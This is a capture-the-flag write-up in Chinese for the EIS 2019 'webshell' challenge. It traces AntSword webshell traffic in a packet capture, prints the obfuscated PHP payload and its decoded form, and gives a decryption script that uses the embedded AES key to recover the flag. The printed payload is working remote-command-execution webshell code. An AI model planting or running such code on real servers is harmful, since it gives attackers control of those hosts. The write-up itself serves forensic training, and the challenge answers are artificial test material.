EIS 2019 webshell

请求中可以确定是http POST流量
image.png
image.png
同时可以判断是 蚁剑的流量
image.png
进一步过滤 http.request.method =="POST"
image.png
直接追踪其tcp流
image.png

  • 得到 列举部分
@eVAl(cHr(0x40).ChR(0x69).ChR(0x6e).ChR(0x69).ChR(0x5f).ChR(0x73).ChR(0x65).ChR(0x74).ChR(0x28)

直接输出一下 内容

<?php
echo(cHr(0x40).ChR(0x69).ChR(0x6e).ChR(0x69).ChR(0x5f).ChR(0x73).ChR(0x65).ChR(0x74).ChR(0x28).ChR(0x22).ChR(0x64).ChR(0x69).ChR(0x73).ChR(0x70).ChR(0x6c).ChR(0x61).ChR(0x79).ChR(0x5f).ChR(0x65).ChR(0x72).ChR(0x72).ChR(0x6f).ChR(0x72).ChR(0x73).ChR(0x22).ChR(0x2c).ChR(0x20).ChR(0x22).ChR(0x30).ChR(0x22).ChR(0x29).ChR(0x3b).ChR(0x40).ChR(0x73).ChR(0x65).ChR(0x74).ChR(0x5f).ChR(0x74).ChR(0x69).ChR(0x6d).ChR(0x65).ChR(0x5f).ChR(0x6c).ChR(0x69).ChR(0x6d).ChR(0x69).ChR(0x74).ChR(0x28).ChR(0x30).ChR(0x29).ChR(0x3b).ChR(0x66).ChR(0x75).ChR(0x6e).ChR(0x63).ChR(0x74).ChR(0x69).ChR(0x6f).ChR(0x6e).ChR(0x20).ChR(0x61).ChR(0x73).ChR(0x65).ChR(0x6e).ChR(0x63).ChR(0x28).ChR(0x24).ChR(0x6f).ChR(0x75).ChR(0x74).ChR(0x29).ChR(0x7b).ChR(0x40).ChR(0x73).ChR(0x65).ChR(0x73).ChR(0x73).ChR(0x69).ChR(0x6f).ChR(0x6e).ChR(0x5f).ChR(0x73).ChR(0x74).ChR(0x61).ChR(0x72).ChR(0x74).ChR(0x28).ChR(0x29).ChR(0x3b).ChR(0x24).ChR(0x6b).ChR(0x65).ChR(0x79).ChR(0x3d).ChR(0x27).ChR(0x66).ChR(0x35).ChR(0x30).ChR(0x34).ChR(0x35).ChR(0x62).ChR(0x30).ChR(0x35).ChR(0x61).ChR(0x62).ChR(0x65).ChR(0x36).ChR(0x65).ChR(0x63).ChR(0x39).ChR(0x62).ChR(0x31).ChR(0x65).ChR(0x33).ChR(0x37).ChR(0x66).ChR(0x61).ChR(0x66).ChR(0x61).ChR(0x38).ChR(0x35).ChR(0x31).ChR(0x66).ChR(0x35).ChR(0x64).ChR(0x65).ChR(0x39).ChR(0x27).ChR(0x3b).ChR(0x72).ChR(0x65).ChR(0x74).ChR(0x75).ChR(0x72).ChR(0x6e).ChR(0x20).ChR(0x40).ChR(0x62).ChR(0x61).ChR(0x73).ChR(0x65).ChR(0x36).ChR(0x34).ChR(0x5f).ChR(0x65).ChR(0x6e).ChR(0x63).ChR(0x6f).ChR(0x64).ChR(0x65).ChR(0x28).ChR(0x6f).ChR(0x70).ChR(0x65).ChR(0x6e).ChR(0x73).ChR(0x73).ChR(0x6c).ChR(0x5f).ChR(0x65).ChR(0x6e).ChR(0x63).ChR(0x72).ChR(0x79).ChR(0x70).ChR(0x74).ChR(0x28).ChR(0x62).ChR(0x61).ChR(0x73).ChR(0x65).ChR(0x36).ChR(0x34).ChR(0x5f).ChR(0x65).ChR(0x6e).ChR(0x63).ChR(0x6f).ChR(0x64).ChR(0x65).ChR(0x28).ChR(0x24).ChR(0x6f).ChR(0x75).ChR(0x74).ChR(0x29).ChR(0x2c).ChR(0x20).ChR(0x27).ChR(0x41).ChR(0x45).ChR(0x53).ChR(0x2d).ChR(0x31).ChR(0x32).ChR(0x38).ChR(0x2d).ChR(0x45).ChR(0x43).ChR(0x42).ChR(0x27).ChR(0x2c).ChR(0x20).ChR(0x24).ChR(0x6b).ChR(0x65).ChR(0x79).ChR(0x2c).ChR(0x20).ChR(0x4f).ChR(0x50).ChR(0x45).ChR(0x4e).ChR(0x53).ChR(0x53).ChR(0x4c).ChR(0x5f).ChR(0x52).ChR(0x41).ChR(0x57).ChR(0x5f).ChR(0x44).ChR(0x41).ChR(0x54).ChR(0x41).ChR(0x29).ChR(0x29).ChR(0x3b).ChR(0x7d).ChR(0x3b).ChR(0x3b).ChR(0x66).ChR(0x75).ChR(0x6e).ChR(0x63).ChR(0x74).ChR(0x69).ChR(0x6f).ChR(0x6e).ChR(0x20).ChR(0x61).ChR(0x73).ChR(0x6f).ChR(0x75).ChR(0x74).ChR(0x70).ChR(0x75).ChR(0x74).ChR(0x28).ChR(0x29).ChR(0x7b).ChR(0x24).ChR(0x6f).ChR(0x75).ChR(0x74).ChR(0x70).ChR(0x75).ChR(0x74).ChR(0x3d).ChR(0x6f).ChR(0x62).ChR(0x5f).ChR(0x67).ChR(0x65).ChR(0x74).ChR(0x5f).ChR(0x63).ChR(0x6f).ChR(0x6e).ChR(0x74).ChR(0x65).ChR(0x6e).ChR(0x74).ChR(0x73).ChR(0x28).ChR(0x29).ChR(0x3b).ChR(0x6f).ChR(0x62).ChR(0x5f).ChR(0x65).ChR(0x6e).ChR(0x64).ChR(0x5f).ChR(0x63).ChR(0x6c).ChR(0x65).ChR(0x61).ChR(0x6e).ChR(0x28).ChR(0x29).ChR(0x3b).ChR(0x65).ChR(0x63).ChR(0x68).ChR(0x6f).ChR(0x20).ChR(0x22).ChR(0x30).ChR(0x38).ChR(0x39).ChR(0x37).ChR(0x64).ChR(0x22).ChR(0x3b).ChR(0x65).ChR(0x63).ChR(0x68).ChR(0x6f).ChR(0x20).ChR(0x40).ChR(0x61).ChR(0x73).ChR(0x65).ChR(0x6e).ChR(0x63).ChR(0x28).ChR(0x24).ChR(0x6f).ChR(0x75).ChR(0x74).ChR(0x70).ChR(0x75).ChR(0x74).ChR(0x29).ChR(0x3b).ChR(0x65).ChR(0x63).ChR(0x68).ChR(0x6f).ChR(0x20).ChR(0x22).ChR(0x36).ChR(0x30).ChR(0x63).ChR(0x39).ChR(0x37).ChR(0x22).ChR(0x3b).ChR(0x7d).ChR(0x6f).ChR(0x62).ChR(0x5f).ChR(0x73).ChR(0x74).ChR(0x61).ChR(0x72).ChR(0x74).ChR(0x28).ChR(0x29).ChR(0x3b).ChR(0x74).ChR(0x72).ChR(0x79).ChR(0x7b).ChR(0x24).ChR(0x70).ChR(0x3d).ChR(0x62).ChR(0x61).ChR(0x73).ChR(0x65).ChR(0x36).ChR(0x34).ChR(0x5f).ChR(0x64).ChR(0x65).ChR(0x63).ChR(0x6f).ChR(0x64).ChR(0x65).ChR(0x28).ChR(0x24).ChR(0x5f).ChR(0x50).ChR(0x4f).ChR(0x53).ChR(0x54).ChR(0x5b).ChR(0x22).ChR(0x30).ChR(0x78).ChR(0x63).ChR(0x34).ChR(0x36).ChR(0x31).ChR(0x65).ChR(0x38).ChR(0x36).ChR(0x31).ChR(0x39).ChR(0x36).ChR(0x66).ChR(0x31).ChR(0x61).ChR(0x22).ChR(0x5d).ChR(0x29).ChR(0x3b).ChR(0x24).ChR(0x73).ChR(0x3d).ChR(0x62).ChR(0x61).ChR(0x73).ChR(0x65).ChR(0x36).ChR(0x34).ChR(0x5f).ChR(0x64).ChR(0x65).ChR(0x63).ChR(0x6f).ChR(0x64).ChR(0x65).ChR(0x28).ChR(0x24).ChR(0x5f).ChR(0x50).ChR(0x4f).ChR(0x53).ChR(0x54).ChR(0x5b).ChR(0x22).ChR(0x30).ChR(0x78).ChR(0x39).ChR(0x65).ChR(0x63).ChR(0x33).ChR(0x66).ChR(0x61).ChR(0x39).ChR(0x38).ChR(0x61).ChR(0x32).ChR(0x38).ChR(0x33).ChR(0x66).ChR(0x22).ChR(0x5d).ChR(0x29).ChR(0x3b).ChR(0x24).ChR(0x64).ChR(0x3d).ChR(0x64).ChR(0x69).ChR(0x72).ChR(0x6e).ChR(0x61).ChR(0x6d).ChR(0x65).ChR(0x28).ChR(0x24).ChR(0x5f).ChR(0x53).ChR(0x45).ChR(0x52).ChR(0x56).ChR(0x45).ChR(0x52).ChR(0x5b).ChR(0x22).ChR(0x53).ChR(0x43).ChR(0x52).ChR(0x49).ChR(0x50).ChR(0x54).ChR(0x5f).ChR(0x46).ChR(0x49).ChR(0x4c).ChR(0x45).ChR(0x4e).ChR(0x41).ChR(0x4d).ChR(0x45).ChR(0x22).ChR(0x5d).ChR(0x29).ChR(0x3b).ChR(0x24).ChR(0x63).ChR(0x3d).ChR(0x73).ChR(0x75).ChR(0x62).ChR(0x73).ChR(0x74).ChR(0x72).ChR(0x28).ChR(0x24).ChR(0x64).ChR(0x2c).ChR(0x30).ChR(0x2c).ChR(0x31).ChR(0x29).ChR(0x3d).ChR(0x3d).ChR(0x22).ChR(0x2f).ChR(0x22).ChR(0x3f).ChR(0x22).ChR(0x2d).ChR(0x63).ChR(0x20).ChR(0x5c).ChR(0x22).ChR(0x7b).ChR(0x24).ChR(0x73).ChR(0x7d).ChR(0x5c).ChR(0x22).ChR(0x22).ChR(0x3a).ChR(0x22).ChR(0x2f).ChR(0x63).ChR(0x20).ChR(0x5c).ChR(0x22).ChR(0x7b).ChR(0x24).ChR(0x73).ChR(0x7d).ChR(0x5c).ChR(0x22).ChR(0x22).ChR(0x3b).ChR(0x24).ChR(0x72).ChR(0x3d).ChR(0x22).ChR(0x7b).ChR(0x24).ChR(0x70).ChR(0x7d).ChR(0x20).ChR(0x7b).ChR(0x24).ChR(0x63).ChR(0x7d).ChR(0x22).ChR(0x3b).ChR(0x66).ChR(0x75).ChR(0x6e).ChR(0x63).ChR(0x74).ChR(0x69).ChR(0x6f).ChR(0x6e).ChR(0x20).ChR(0x66).ChR(0x65).ChR(0x28).ChR(0x24).ChR(0x66).ChR(0x29).ChR(0x7b).ChR(0x24).ChR(0x64).ChR(0x3d).ChR(0x65).ChR(0x78).ChR(0x70).ChR(0x6c).ChR(0x6f).ChR(0x64).ChR(0x65).ChR(0x28).ChR(0x22).ChR(0x2c).ChR(0x22).ChR(0x2c).ChR(0x40).ChR(0x69).ChR(0x6e).ChR(0x69).ChR(0x5f).ChR(0x67).ChR(0x65).ChR(0x74).ChR(0x28).ChR(0x22).ChR(0x64).ChR(0x69).ChR(0x73).ChR(0x61).ChR(0x62).ChR(0x6c).ChR(0x65).ChR(0x5f).ChR(0x66).ChR(0x75).ChR(0x6e).ChR(0x63).ChR(0x74).ChR(0x69).ChR(0x6f).ChR(0x6e).ChR(0x73).ChR(0x22).ChR(0x29).ChR(0x29).ChR(0x3b).ChR(0x69).ChR(0x66).ChR(0x28).ChR(0x65).ChR(0x6d).ChR(0x70).ChR(0x74).ChR(0x79).ChR(0x28).ChR(0x24).ChR(0x64).ChR(0x29).ChR(0x29).ChR(0x7b).ChR(0x24).ChR(0x64).ChR(0x3d).ChR(0x61).ChR(0x72).ChR(0x72).ChR(0x61).ChR(0x79).ChR(0x28).ChR(0x29).ChR(0x3b).ChR(0x7d).ChR(0x65).ChR(0x6c).ChR(0x73).ChR(0x65).ChR(0x7b).ChR(0x24).ChR(0x64).ChR(0x3d).ChR(0x61).ChR(0x72).ChR(0x72).ChR(0x61).ChR(0x79).ChR(0x5f).ChR(0x6d).ChR(0x61).ChR(0x70).ChR(0x28).ChR(0x27).ChR(0x74).ChR(0x72).ChR(0x69).ChR(0x6d).ChR(0x27).ChR(0x2c).ChR(0x61).ChR(0x72).ChR(0x72).ChR(0x61).ChR(0x79).ChR(0x5f).ChR(0x6d).ChR(0x61).ChR(0x70).ChR(0x28).ChR(0x27).ChR(0x73).ChR(0x74).ChR(0x72).ChR(0x74).ChR(0x6f).ChR(0x6c).ChR(0x6f).ChR(0x77).ChR(0x65).ChR(0x72).ChR(0x27).ChR(0x2c).ChR(0x24).ChR(0x64).ChR(0x29).ChR(0x29).ChR(0x3b).ChR(0x7d).ChR(0x72).ChR(0x65).ChR(0x74).ChR(0x75).ChR(0x72).ChR(0x6e).ChR(0x28).ChR(0x66).ChR(0x75).ChR(0x6e).ChR(0x63).ChR(0x74).ChR(0x69).ChR(0x6f).ChR(0x6e).ChR(0x5f).ChR(0x65).ChR(0x78).ChR(0x69).ChR(0x73).ChR(0x74).ChR(0x73).ChR(0x28).ChR(0x24).ChR(0x66).ChR(0x29).ChR(0x26).ChR(0x26).ChR(0x69).ChR(0x73).ChR(0x5f).ChR(0x63).ChR(0x61).ChR(0x6c).ChR(0x6c).ChR(0x61).ChR(0x62).ChR(0x6c).ChR(0x65).ChR(0x28).ChR(0x24).ChR(0x66).ChR(0x29).ChR(0x26).ChR(0x26).ChR(0x21).ChR(0x69).ChR(0x6e).ChR(0x5f).ChR(0x61).ChR(0x72).ChR(0x72).ChR(0x61).ChR(0x79).ChR(0x28).ChR(0x24).ChR(0x66).ChR(0x2c).ChR(0x24).ChR(0x64).ChR(0x29).ChR(0x29).ChR(0x3b).ChR(0x7d).ChR(0x3b).ChR(0x66).ChR(0x75).ChR(0x6e).ChR(0x63).ChR(0x74).ChR(0x69).ChR(0x6f).ChR(0x6e).ChR(0x20).ChR(0x72).ChR(0x75).ChR(0x6e).ChR(0x63).ChR(0x6d).ChR(0x64).ChR(0x28).ChR(0x24).ChR(0x63).ChR(0x29).ChR(0x7b).ChR(0x24).ChR(0x72).ChR(0x65).ChR(0x74).ChR(0x3d).ChR(0x30).ChR(0x3b).ChR(0x69).ChR(0x66).ChR(0x28).ChR(0x66).ChR(0x65).ChR(0x28).ChR(0x27).ChR(0x73).ChR(0x79).ChR(0x73).ChR(0x74).ChR(0x65).ChR(0x6d).ChR(0x27).ChR(0x29).ChR(0x29).ChR(0x7b).ChR(0x40).ChR(0x73).ChR(0x79).ChR(0x73).ChR(0x74).ChR(0x65).ChR(0x6d).ChR(0x28).ChR(0x24).ChR(0x63).ChR(0x2c).ChR(0x24).ChR(0x72).ChR(0x65).ChR(0x74).ChR(0x29).ChR(0x3b).ChR(0x7d).ChR(0x65).ChR(0x6c).ChR(0x73).ChR(0x65).ChR(0x69).ChR(0x66).ChR(0x28).ChR(0x66).ChR(0x65).ChR(0x28).ChR(0x27).ChR(0x70).ChR(0x61).ChR(0x73).ChR(0x73).ChR(0x74).ChR(0x68).ChR(0x72).ChR(0x75).ChR(0x27).ChR(0x29).ChR(0x29).ChR(0x7b).ChR(0x40).ChR(0x70).ChR(0x61).ChR(0x73).ChR(0x73).ChR(0x74).ChR(0x68).ChR(0x72).ChR(0x75).ChR(0x28).ChR(0x24).ChR(0x63).ChR(0x2c).ChR(0x24).ChR(0x72).ChR(0x65).ChR(0x74).ChR(0x29).ChR(0x3b).ChR(0x7d).ChR(0x65).ChR(0x6c).ChR(0x73).ChR(0x65).ChR(0x69).ChR(0x66).ChR(0x28).ChR(0x66).ChR(0x65).ChR(0x28).ChR(0x27).ChR(0x73).ChR(0x68).ChR(0x65).ChR(0x6c).ChR(0x6c).ChR(0x5f).ChR(0x65).ChR(0x78).ChR(0x65).ChR(0x63).ChR(0x27).ChR(0x29).ChR(0x29).ChR(0x7b).ChR(0x70).ChR(0x72).ChR(0x69).ChR(0x6e).ChR(0x74).ChR(0x28).ChR(0x40).ChR(0x73).ChR(0x68).ChR(0x65).ChR(0x6c).ChR(0x6c).ChR(0x5f).ChR(0x65).ChR(0x78).ChR(0x65).ChR(0x63).ChR(0x28).ChR(0x24).ChR(0x63).ChR(0x29).ChR(0x29).ChR(0x3b).ChR(0x7d).ChR(0x65).ChR(0x6c).ChR(0x73).ChR(0x65).ChR(0x69).ChR(0x66).ChR(0x28).ChR(0x66).ChR(0x65).ChR(0x28).ChR(0x27).ChR(0x65).ChR(0x78).ChR(0x65).ChR(0x63).ChR(0x27).ChR(0x29).ChR(0x29).ChR(0x7b).ChR(0x40).ChR(0x65).ChR(0x78).ChR(0x65).ChR(0x63).ChR(0x28).ChR(0x24).ChR(0x63).ChR(0x2c).ChR(0x24).ChR(0x6f).ChR(0x2c).ChR(0x24).ChR(0x72).ChR(0x65).ChR(0x74).ChR(0x29).ChR(0x3b).ChR(0x70).ChR(0x72).ChR(0x69).ChR(0x6e).ChR(0x74).ChR(0x28).ChR(0x6a).ChR(0x6f).ChR(0x69).ChR(0x6e).ChR(0x28).ChR(0x22).ChR(0xa).ChR(0x22).ChR(0x2c).ChR(0x24).ChR(0x6f).ChR(0x29).ChR(0x29).ChR(0x3b).ChR(0x7d).ChR(0x65).ChR(0x6c).ChR(0x73).ChR(0x65).ChR(0x69).ChR(0x66).ChR(0x28).ChR(0x66).ChR(0x65).ChR(0x28).ChR(0x27).ChR(0x70).ChR(0x6f).ChR(0x70).ChR(0x65).ChR(0x6e).ChR(0x27).ChR(0x29).ChR(0x29).ChR(0x7b).ChR(0x24).ChR(0x66).ChR(0x70).ChR(0x3d).ChR(0x40).ChR(0x70).ChR(0x6f).ChR(0x70).ChR(0x65).ChR(0x6e).ChR(0x28).ChR(0x24).ChR(0x63).ChR(0x2c).ChR(0x27).ChR(0x72).ChR(0x27).ChR(0x29).ChR(0x3b).ChR(0x77).ChR(0x68).ChR(0x69).ChR(0x6c).ChR(0x65).ChR(0x28).ChR(0x21).ChR(0x40).ChR(0x66).ChR(0x65).ChR(0x6f).ChR(0x66).ChR(0x28).ChR(0x24).ChR(0x66).ChR(0x70).ChR(0x29).ChR(0x29).ChR(0x7b).ChR(0x70).ChR(0x72).ChR(0x69).ChR(0x6e).ChR(0x74).ChR(0x28).ChR(0x40).ChR(0x66).ChR(0x67).ChR(0x65).ChR(0x74).ChR(0x73).ChR(0x28).ChR(0x24).ChR(0x66).ChR(0x70).ChR(0x2c).ChR(0x20).ChR(0x32).ChR(0x30).ChR(0x34).ChR(0x38).ChR(0x29).ChR(0x29).ChR(0x3b).ChR(0x7d).ChR(0x40).ChR(0x70).ChR(0x63).ChR(0x6c).ChR(0x6f).ChR(0x73).ChR(0x65).ChR(0x28).ChR(0x24).ChR(0x66).ChR(0x70).ChR(0x29).ChR(0x3b).ChR(0x7d).ChR(0x65).ChR(0x6c).ChR(0x73).ChR(0x65).ChR(0x69).ChR(0x66).ChR(0x28).ChR(0x66).ChR(0x65).ChR(0x28).ChR(0x27).ChR(0x61).ChR(0x6e).ChR(0x74).ChR(0x73).ChR(0x79).ChR(0x73).ChR(0x74).ChR(0x65).ChR(0x6d).ChR(0x27).ChR(0x29).ChR(0x29).ChR(0x7b).ChR(0x40).ChR(0x61).ChR(0x6e).ChR(0x74).ChR(0x73).ChR(0x79).ChR(0x73).ChR(0x74).ChR(0x65).ChR(0x6d).ChR(0x28).ChR(0x24).ChR(0x63).ChR(0x29).ChR(0x3b).ChR(0x7d).ChR(0x65).ChR(0x6c).ChR(0x73).ChR(0x65).ChR(0x7b).ChR(0x24).ChR(0x72).ChR(0x65).ChR(0x74).ChR(0x20).ChR(0x3d).ChR(0x20).ChR(0x31).ChR(0x32).ChR(0x37).ChR(0x3b).ChR(0x7d).ChR(0x72).ChR(0x65).ChR(0x74).ChR(0x75).ChR(0x72).ChR(0x6e).ChR(0x20).ChR(0x24).ChR(0x72).ChR(0x65).ChR(0x74).ChR(0x3b).ChR(0x7d).ChR(0x3b).ChR(0x24).ChR(0x72).ChR(0x65).ChR(0x74).ChR(0x3d).ChR(0x40).ChR(0x72).ChR(0x75).ChR(0x6e).ChR(0x63).ChR(0x6d).ChR(0x64).ChR(0x28).ChR(0x24).ChR(0x72).ChR(0x2e).ChR(0x22).ChR(0x20).ChR(0x32).ChR(0x3e).ChR(0x26).ChR(0x31).ChR(0x22).ChR(0x29).ChR(0x3b).ChR(0x70).ChR(0x72).ChR(0x69).ChR(0x6e).ChR(0x74).ChR(0x20).ChR(0x28).ChR(0x24).ChR(0x72).ChR(0x65).ChR(0x74).ChR(0x21).ChR(0x3d).ChR(0x30).ChR(0x29).ChR(0x3f).ChR(0x22).ChR(0x72).ChR(0x65).ChR(0x74).ChR(0x3d).ChR(0x7b).ChR(0x24).ChR(0x72).ChR(0x65).ChR(0x74).ChR(0x7d).ChR(0x22).ChR(0x3a).ChR(0x22).ChR(0x22).ChR(0x3b).ChR(0x3b).ChR(0x7d).ChR(0x63).ChR(0x61).ChR(0x74).ChR(0x63).ChR(0x68).ChR(0x28).ChR(0x45).ChR(0x78).ChR(0x63).ChR(0x65).ChR(0x70).ChR(0x74).ChR(0x69).ChR(0x6f).ChR(0x6e).ChR(0x20).ChR(0x24).ChR(0x65).ChR(0x29).ChR(0x7b).ChR(0x65).ChR(0x63).ChR(0x68).ChR(0x6f).ChR(0x20).ChR(0x22).ChR(0x45).ChR(0x52).ChR(0x52).ChR(0x4f).ChR(0x52).ChR(0x3a).ChR(0x2f).ChR(0x2f).ChR(0x22).ChR(0x2e).ChR(0x24).ChR(0x65).ChR(0x2d).ChR(0x3e).ChR(0x67).ChR(0x65).ChR(0x74).ChR(0x4d).ChR(0x65).ChR(0x73).ChR(0x73).ChR(0x61).ChR(0x67).ChR(0x65).ChR(0x28).ChR(0x29).ChR(0x3b).ChR(0x7d).ChR(0x3b).ChR(0x61).ChR(0x73).ChR(0x6f).ChR(0x75).ChR(0x74).ChR(0x70).ChR(0x75).ChR(0x74).ChR(0x28).ChR(0x29).ChR(0x3b).ChR(0x64).ChR(0x69).ChR(0x65).ChR(0x28).ChR(0x29).ChR(0x3b));
?>

image.png
php代码美化后

<?php
echo "Hello World !";
?>@ini_set("display_errors", "0");
@set_time_limit(0);
function asenc($out) {@session_start();$key='f5045b05abe6ec9b1e37fafa851f5de9';return @base64_encode(openssl_encrypt(base64_encode($out), 'AES-128-ECB', $key, OPENSSL_RAW_DATA));
}
;
;
function asoutput() {$output=ob_get_contents();ob_end_clean();echo "0897d";echo @asenc($output);echo "60c97";
}
ob_start();
try {$p=base64_decode($_POST["0xc461e86196f1a"]);$s=base64_decode($_POST["0x9ec3fa98a283f"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";function fe($f) {$d=explode(",",@ini_get("disable_functions"));if(empty($d)) {$d=array();} else {$d=array_map('trim',array_map('strtolower',$d));}return(function_exists($f)&&is_callable($f)&&!in_array($f,$d));};function runcmd($c) {$ret=0;if(fe('system')) {@system($c,$ret);} elseif(fe('passthru')) {@passthru($c,$ret);} elseif(fe('shell_exec')) {print(@shell_exec($c));} elseif(fe('exec')) {@exec($c,$o,$ret);print(join("
",$o));} elseif(fe('popen')) {$fp=@popen($c,'r');while(!@feof($fp)) {print(@fgets($fp, 2048));}@pclose($fp);} elseif(fe('antsystem')) {@antsystem($c);} else {$ret = 127;}return $ret;};$ret=@runcmd($r." 2>&1");print ($ret!=0)?"ret={$ret}":"";;
}
catch(Exception $e) {echo "ERROR://".$e->getMessage();
}
;
asoutput();
die();

已知加密的逻辑

function asenc($out) {@session_start();$key='f5045b05abe6ec9b1e37fafa851f5de9';return @base64_encode(openssl_encrypt(base64_encode($out), 'AES-128-ECB', $key, OPENSSL_RAW_DATA));
}
;
;
function asoutput() {$output=ob_get_contents();ob_end_clean();echo "0897d";echo @asenc($output);echo "60c97";
}

对加密逻辑相反对应的解密脚本

<?php$cipher = "";function decrypt($cipher) {$key = 'f5045b05abe6ec9b1e37fafa851f5de9';return @base64_decode(openssl_decrypt(base64_decode($cipher), 'AES-128-ECB', $key, OPENSSL_RAW_DATA));
};$cipher = substr($cipher, 5, strlen($cipher) - 10);
echo decrypt($cipher);

对每个tcp流响应尝试解密 最后发现第7个响应数据包

8c2b4kRD1eD+vSZ81FAJ6XClabCR0xNFklup5/x+gixas3l0kdMTRZJbqef8foIsWrN5dJHTE0WSW6nn/H6CLFqzeXSR0xNFklup5/x+gixas3l0kdMTRZJbqef8foIsWrN5dZOTFg4DW9MYwG6k3rEvAAR8oFStGnfMRtUJOqc0mgokfKBUrRp3zEbVCTqnNJoKJHygVK0ad8xG1Qk6pzSaCiR8oFStGnf
<?php$cipher = "8c2b4kRD1eD+vSZ81FAJ6XClabCR0xNFklup5/x+gixas3l0kdMTRZJbqef8foIsWrN5dJHTE0WSW6nn/H6CLFqzeXSR0xNFklup5/x+gixas3l0kdMTRZJbqef8foIsWrN5dZOTFg4DW9MYwG6k3rEvAAR8oFStGnfMRtUJOqc0mgokfKBUrRp3zEbVCTqnNJoKJHygVK0ad8xG1Qk6pzSaCiR8oFStGnfMRtUJOqc0mgokfKBUrRp3zEbVCTqnNJoKJ1qI47Cz1/qfnNoNARGhLfVhC0RJlfeKCvbPwpjFn//BSFY8RJlZyxz1a+TPy0D3cUhWPESZWcsc9Wvkz8tA93FIVjxEmVnLHPVr5M/LQPdxSFY8RJlZyxz1a+TPy0D3cUhWPESZWcsc9Wvkz8tA93GnMvJfVbvphfWnt17IOkzYjvv91k2fnYDR7u4nlGM3YitxGYGs9mn+HS5iJBXORtYrcRmBrPZp/h0uYiQVzkbWK3EZgaz2af4dLmIkFc5G1itxGYGs9mn+HS5iJBXORtUq4dBjDRFhDqDyzs9CScJhrd3yMusQ+qsnZkq4Ey7NVJHTE0WSW6nn/H6CLFqzeXSR0xNFklup5/x+gixas3l0kdMTRZJbqef8foIsWrN5dJHTE0WSW6nn/H6CLFqzeXSR0xNFklup5/x+gixas3l2hDPuDhVN4TaDLzp9bXyfGeCVhvglAaNo2rA/ovnRTTtfA5ZywMOOijj6md5RItqjXwOWcsDDjoo4+pneUSLao18DlnLAw46KOPqZ3lEi2qNfA5ZywMOOijj6md5RItqgS0b9hS7r5TX9YNZo2awgUAyqVacVgwr1NlNQ2k/kihhh0QQfnjeGdZhkz0N0jAKiMzFmAMa7xQ1URxTaHoHjDg3NaWl/8+PVG+pyaKrbNDjfl77POeQE8+0MCHpz6YxWLJ6mwCe1X3uzz/HSHcHSvQBB8FxjOhugOErOXkd3LZi/60Gr4gIEc1JIxA5A2pE/V6Z/DFwNOR4M/IIIWdGr5e2e10";function decrypt($cipher) {$key = 'f5045b05abe6ec9b1e37fafa851f5de9';return @base64_decode(openssl_decrypt(base64_decode($cipher), 'AES-128-ECB', $key, OPENSSL_RAW_DATA));
};$cipher = substr($cipher, 5, strlen($cipher) - 10);
echo decrypt($cipher);

image.png
base64解码后就是flag
image.png
flag{AntSword_is_Powerful_3222222!!!}

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/pingmian/22077.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

DeepMind:从LLMs到VLMs,不用看图就能理解图?

论文标题&#xff1a; FlexCap: Generating Rich, Localized, and Flexible Captions in Images 论文作者&#xff1a; Debidatta Dwibedi, Vidhi Jain, Jonathan Tompson, Andrew Zisserman, and Yusuf Aytar 参与机构&#xff1a; Google DeepMind, Carnegie Mellon Uni…

【Power Compiler手册】8.生成功耗报告

生成功耗报告 本节包含使用 `report_power` 命令生成的报告示例。 在topographical下,`report_power` 命令报告相关功耗,包括估计的时钟树功耗和网络表功耗。如果工具无法执行时钟树估计,Power Compiler 工具会发出警告,指出无法执行时钟树估计。 功耗报告的示例如下: …

C语言--toupper/tolower/isupper/islower函数介绍

介绍 toupper&#xff08;&#xff09; 是一个用于将字符转换为大写的 C/C 函数&#xff0c;它位于 头文件中。使用 toupper 函数很简单&#xff0c;只需要将要转换的字符作为参数传递给它即可。 同理&#xff1a;tolower&#xff08;&#xff09;是将一个字符转换为小写的函数…

Quantlab 4.1:基于Deap遗传算法多股票因子挖掘

原创文章第549篇&#xff0c;专注“AI量化投资、世界运行的规律、个人成长与财富自由"。 遗传算法本身并不复杂&#xff0c;但gplearn的实现&#xff0c;把问题复杂化了&#xff0c;尤其在因子挖掘这个场景。 使用deap进行因子挖掘的代码在如下位置&#xff1a; import …

企微语音群发软件:开启企业沟通新纪元

在数字化、智能化的今天&#xff0c;企业沟通方式也在不断地迭代和升级。企业微信&#xff08;企微&#xff09;作为企业内部沟通和外部拓展的重要工具&#xff0c;其功能的丰富性和便捷性为企业带来了诸多便利。其中&#xff0c;企微语音群发软件的出现&#xff0c;更是为企业…

consul数据持久化

一、下载consul 下载链接:Install | Consul | HashiCorp Developer 启动&#xff1a; 这里以windows系统为例&#xff0c;需要在consul.exe目录执行 #查看版本号&#xff1a; consul -version #启动命令&#xff1a; consul agent -dev 访问地址&#xff1a;http://localh…

Nexus3(nexus-3.19.1-01)忘记管理员密码

1、停服 ./nexus stop 2、进入OrientDB控制台&#xff1a; cd /apply/nexus3/nexus-3.42.0-01/lib/support/ java -jar ./nexus-orient-console.jar 3、在控制台执行&#xff1a; connect plocal:/apply/nexus3/sonatype-work/nexus3/db/security admin admin 4、重置密码…

前端工程化工具系列(七)—— PNPM(v9.1.4):高性能的 NPM 替代品

PNPM&#xff08;Performant NPM&#xff09;是一个高效的 NPM 包管理器&#xff0c;它使用硬链接和符号链接来减少磁盘空间的使用&#xff0c;并提高了安装速度。 1. 环境要求 v9 的 PNPM 需要 Node.js v18。 2. 安装 npm i -g pnpm3 基本功能 3.1 安装包 安装单个包&am…

【postgresql初级使用】触发器的创建删除,你不知道的触发器函数中的系统变量,数据一致性还可以这样来保证

使用触发器 ​专栏内容&#xff1a; postgresql使用入门基础手写数据库toadb并发编程 个人主页&#xff1a;我的主页 管理社区&#xff1a;开源数据库 座右铭&#xff1a;天行健&#xff0c;君子以自强不息&#xff1b;地势坤&#xff0c;君子以厚德载物. 文章目录 使用触发器概…

Redis之常用实战场景

1.Redis数据丢失场景 1.1 持久化丢失 采用RDB或者不持久化&#xff0c;就会有数据丢失&#xff0c;因为是手动或者配置以快照的形式来进行备份。 解决: 启用AOF&#xff0c;以命令追加的形式进行备份&#xff0c;但是默认也会有1s丢失&#xff0c;这是在性能与数据安全性中寻…

K-means聚类模型算法

